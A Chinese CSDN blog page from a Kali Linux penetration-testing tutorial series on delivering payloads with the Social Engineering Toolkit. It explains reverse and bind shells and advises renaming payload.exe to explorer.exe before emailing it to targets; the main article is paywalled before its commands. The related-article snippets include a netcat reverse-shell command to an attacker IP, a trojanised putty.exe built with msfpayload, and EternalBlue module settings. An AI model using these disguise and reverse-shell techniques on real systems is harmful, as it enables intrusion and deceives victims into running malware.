Kali学习 | 权限提升:5.4 社工SET_传递攻击载荷

最新推荐文章于 2023-02-07 21:59:13 发布
最新推荐文章于 2023-02-07 21:59:13 发布
阅读量448 收藏 1
点赞数
分类专栏: Kali Linux渗透测试 文章标签: 安全 渗透 kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/103987584
版权
本文介绍了如何在Kali Linux中利用社会工程学工具SET进行权限提升,重点讲解了攻击载荷Payload的概念,包括反弹式Shell和Bind Shell。详细阐述了操作步骤,包括修改payload.exe文件名,将其伪装成explorer.exe并通过邮件发送给目标,最终成功建立攻击者与目标系统的会话。
摘要由CSDN通过智能技术生成

Kali学习 | 权限提升:5.4 社工SET_传递攻击载荷

攻击载荷 Payload

攻击载荷(Payload)指的是用户期望目标系统在被渗透攻击之后执行的代码。
在Metasploit框架中可以自由地选择、传送和植入
例如,反弹式Shell是一种从目标主机到攻击主机创建网络连接,并提供命令行Shell的攻击载荷,而Bind Shell攻击载荷则在目标系统上将命令行Shell绑定到一个打开的监听端口,攻击者可以连接这些端口来取得Shell交互。
攻击载荷也可能是简单的在目标系统上执行一些命令,如添加用户账号等。

操作步骤

(1)社会工程学工具默认安装在/usr/share/set下,在该目录中有一个EXE文件,名为payload.exe。
在渗透测试时为了避免被目标主机用户发现,建议修改该文件名,然后再发送给其他人。
发送给其他人的方法很多,如邮件和存储在优盘等。
首先切换到/usr/share/set目录中,查看该目录下的文件。
执行命令如下所示:
在这里插入图片描述
从以上内容中可以看到有一个名为payload.exe的文件。
接下来可以修改该文件的名为explorer.exe,然后发送给其他人。

(2)修改payload.exe文件名。执行命令如下所示:

最低0.47元/天 解锁文章
CNwanku
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali_patched_docker:完整修补的Kali Docker映像
02-16
kali_patched_docker 完整修补的Kali Docker映像。
渗透工具——kali中msf简介(以及MSF的基本使用方法)
最新发布
2301_78006725的博客
09-02 7301
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
NC获取系统权限
Flynn的博客
04-02 699
Netcat 利用nc工具可以使命令注入攻击变得更加六匹 命令注入思路总结 反向 reverse shell 反向shell是从目标主机发起到处于监听状态的攻击机器的shell连接方式,又叫被动连接 nc实现shell反弹 step1-攻击机开始监听本地端口 nc -lvp 4444 step2-目标机向攻击机的端口提供shell,实现权限转移 nc 192.168.43.175 4444 -e /bin/bash step3-当在攻击端看到收到连接后就说明已经得到了目标机器的部分shell了
使用SET实施攻击
qq_44111753的博客
12-13 545
1、针对性钓鱼攻击向量 1)启动社会工程学 2)选择社会工程学(1) 3)选择攻击类型,这里选择钓鱼攻击向量(1) 输出信息中显示了钓鱼攻击向量的可用工具载荷 4)这里选择电子邮件攻击(1) 输出的信息显示了钓鱼向量中可以使用的文件格式,默认是PDF格式 5)这里利用的是Abobe PDF的Collab.collectEmaillnfo漏洞,所以选择编号8 输出信息显示了攻击的方式 6)这里选择第二个模块 攻击载荷创建完成,询问是否要重命名文件 7)使用默认文件(1) 输出信息显示了邮件攻击的方式
Kali学习 | 权限提升:5.8 SET_针对性钓鱼攻击向量
qq_43233085的博客
01-17 375
Kali学习 | 权限提升:5.8 SET_针对性钓鱼攻击向量介绍操作步骤 介绍 针对性钓鱼攻击向量通过构造特殊文件格式的漏洞进行渗透攻击,如利用Adobe Reader 8.1.0(PDF阅读器)的漏洞。 实现钓鱼攻击向量主要通过发送邮件附件的方式,将包含渗透代码的文件发送到目标主机。 当目标主机的用户打开邮件附件时,目标主机就会被攻陷和控制。 SET使用简单邮件管理协议(SMTP)的开放代理(...
msf攻击载荷生成器
我还在的博客
10-06 1637
msf攻击载荷生成器0x00 前言0x01 拓扑结构0x02 过程1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程 0x00 前言 这是我对 msf攻击载荷生成器的学习记录。 0x01 拓扑结构 0x02 过程 1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程 1.1 显示msfpayload命令的使用方法:msfp...
Kali-NotepadPlusPlus_Theme:记事本++的Kali主题
05-23
Kali-NotepadPlusPlus_Theme 记事本++的Kali主题 要安装此Notepad ++主题,请执行以下操作: 下载XML文件并将其移至Notepad ++主题文件夹(通常为C:\ Program Files \ Notepad ++ \ themes \或C:\ Program Files...
kali-Linux-learning::wolf:Kali Linux学习资料(Books&WebSites)
05-29
下面提供的信息并不是鼓励邪恶攻击,而是协助开发者测试自己的系统和网络,请勿用在它处。May the brute force be with you.密码破解无线攻击嗅探 & 欺骗在Wifi网络中嗅探明文密码(HTTP POST请求、POP等)使用Kali ...
Kali-Linux-Pwnr:专为 Kali Linux 系统设计的 HID USB 攻击
06-21
Kali-Linux-Pwnr 专为 Kali Linux 系统设计的 HID USB 攻击。演示全攻击有什么作用打开 Gnome 终端运行 Python Shell 使用 Kali 将背景更改为滑行去做找出 Kali 启动设备的路径将引导加载程序写入硬盘,破坏 MBR笔记...
kali-linux-docker:使用Docker学习Kali-linux
03-13
kali-linux-docker 使用Docker学习Kali-linux
社会工程学工具集
06-26
社会工程学工具包(SET)是一个开源的、Python驱动的社会工程学渗透测试工具。这套工具包由David Kenned设计,而且已经成为业界部署实施社会工程学攻击的标准。SET利用人们的好奇心、信任、贪婪及一些愚蠢的错误,攻击人们自身存在的弱点。使用SET可以传递攻击载荷到目标系统,收集目标系统数据,创建持久后门,进行中间人攻击等。本节将介绍社会工程学工具包的使用。这是主要讲解【set】社会工程学工具包的使用
Kali Linux-SET社会工程学攻击
道阻且长,行则将至。
12-26 1万+
前言 社会工程攻击,是一种利用“社会工程学” (Social Engineering)来实施的网络攻击行为。比如免费下载的软件中捆绑了流氓软件、免费音乐中包含病毒、钓鱼网站、垃圾电子邮件中包括间谍软件等,都是近来社会工程学的代表应用。 Kali Linux系统集成了一款社会工程学工具包 Social Engineering Toolkit (SET),它是一个基于Python的开源的社会工程学渗透...
Kali-linux使用SET实施攻击
qq_44508509的博客
05-03 2272
Kali-linux使用SET实施攻击 前面介绍了社会工程学工具包(SET)的简单使用。为了能帮助用户更容易的理解社会工程学的强大功能。本节将介绍使用社会工程学工具包实施各种攻击。 7.4.1 针对性钓鱼攻击向量 针对性钓鱼攻击向量通过构造特殊文件格式的漏洞进行渗透攻击,如利用Adobe Reader 8.1.0(PDF阅读器)的漏洞。实现钓鱼攻击向量主要通过发送邮件附件的方式,将包含渗透代码的文...
metasploit隐秘地启动一个攻击载荷
天元喜羊羊的博客
05-01 4563
在网上下载putty.exe,上传到bt5,然后复制到/opt/metasploit/msf3/work目录 root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -t exe -x work/putty.exe
学习笔记-kali基本配置
m0_49081269的博客
12-21 347
Kali基本用法和配置 因为我的kali没有下载完成 所以没有截图 后期会补充 一、安装: 略 二、基本用法 用户: 修改默认用户:passwd root [修改root用户密码] 新建用户:adduser 11 [添加用户11] 删除用户:userdel 11 赋予权限:usermod -a -G sudo 11 查看用户信息:id 11 【此处需要验证图片】 网络: 查看网络基本信息:ipconfig 【此处需要验证图片】 配置网络基本信息: Ifconfig eth0 主机ip netwask
Kali常见攻击手段
weixin_45565886的博客
02-07 2万+
Kali常见攻击手段
进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器
weixin_43263566的博客
01-06 6653
Kali最强渗透工具- metasploit
Kalikali主要工具使用说明(文末附超全思维导图)
热门推荐
PP_zi的博客
05-11 4万+
本文为《从实践中学习Kali Linux渗透测试》总结笔记,仅供学习使用,禁止用于非法用途,转载请附上原文链接! 1. 信息收集 1.1 发现主机 traceroute 获取目标主机的路由条目,确定网络拓扑。每一跳表示一个网关,星号可能为防火墙导致。 1.1.1 扫描主机 ① nmap nmap -sP ip/ip段 对目标主机实施ping扫描,探测主机是否在线 也可以通过其他语法,扫描主机开放端口、使用的操作系统等 ② Netdiscover ARP侦查工具,可以扫描IP地址,检查在线主机。 .
理解攻击载荷
小山岷的专栏
01-10 1万+
攻击载荷(payload)是系统被攻陷后执行的操作。通常攻击载荷附加于漏洞攻击模块之上,随漏洞攻击一起分发。攻击载荷主分别为:singles stagers stagessinglesSingles are payloads that are self-contained and completely standalone. A Single payload can be some
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值